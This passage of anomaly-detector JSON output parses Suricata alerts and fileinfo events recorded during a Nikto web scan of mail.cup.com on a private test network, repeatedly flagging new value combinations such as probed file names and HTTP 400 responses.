"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.204806 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46816 -> 192.168.10.154:80", "/parser/model/time": 1583349514.204806, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46816, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.204806 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46816 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.backup", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.205030+0000\",\"flow_id\":733129426476444,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.20503, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":733129426476444,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.backup\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.backup\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.backup", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", 
"/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.backup", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46816, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":733129426476444,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 733129426476444, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.205030+0000\",\"flow_id\":733129426476444,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46816,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.backup\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.backup\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": 
[ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.206813 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46818 -> 192.168.10.154:80", "/parser/model/time": 1583349514.206813, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46818, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.206813 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46818 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": 
"NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.xls", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.207040+0000\",\"flow_id\":2162825255068915,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.20704, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2162825255068915,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.xls\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.xls\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.xls", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.xls", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": 
"\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46818, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2162825255068915,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2162825255068915, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.207040+0000\",\"flow_id\":2162825255068915,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46818,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xls\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xls\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.208607 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46820 -> 192.168.10.154:80", "/parser/model/time": 1583349514.208607, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46820, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.208607 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by 
non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46820 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ini", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.208779+0000\",\"flow_id\":78486216256524,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.208779, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":78486216256524,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 
"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ini\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": 
",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ini\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ini", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ini", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", 
"/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46820, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", 